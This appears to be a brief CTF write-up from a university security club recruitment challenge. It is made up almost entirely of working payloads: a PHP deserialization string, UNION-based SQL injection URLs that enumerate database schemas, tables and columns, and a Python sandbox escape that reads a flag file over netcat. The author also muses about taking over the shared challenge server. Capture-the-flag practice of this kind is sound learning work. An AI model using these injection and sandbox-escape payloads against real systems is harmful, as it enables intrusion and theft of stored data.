[Tsinghua Network Security Technology Association Recruitment](WEB)

Not a very substantial post, so feel free to skip it. It is also from a long time ago...

http://120.76.114.164:21080/web6/?pass=O%3A7%3A%22justfun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A2%3B%7D
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(schema_name),%27b%27%20from%20information_schema.schemata%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(table_name),%27b%27%20from%20information_schema.tables%20where%20table_schema=%27web%27%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27user%27%20order%20by%201%20desc%23
id: id,name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web1_users%27%20order%20by%201%20desc%23
id: name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web3_users%27%20order%20by%201%20desc%23
id: id,name
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web4_messages%27%20order%20by%201%20desc%23
id: id,message
message: b
flag0
flag1
flag3

Damn... all four challenges are actually on the same server...
Feels like, if things go wrong, you could get access to the server directly...

There is actually a second challenge...

~ ›› nc 120.76.114.164 12008                                                   
Give me your command!
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
inp= ().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
Return Value: ctf{pyth0n_1s_als0_unsaf3}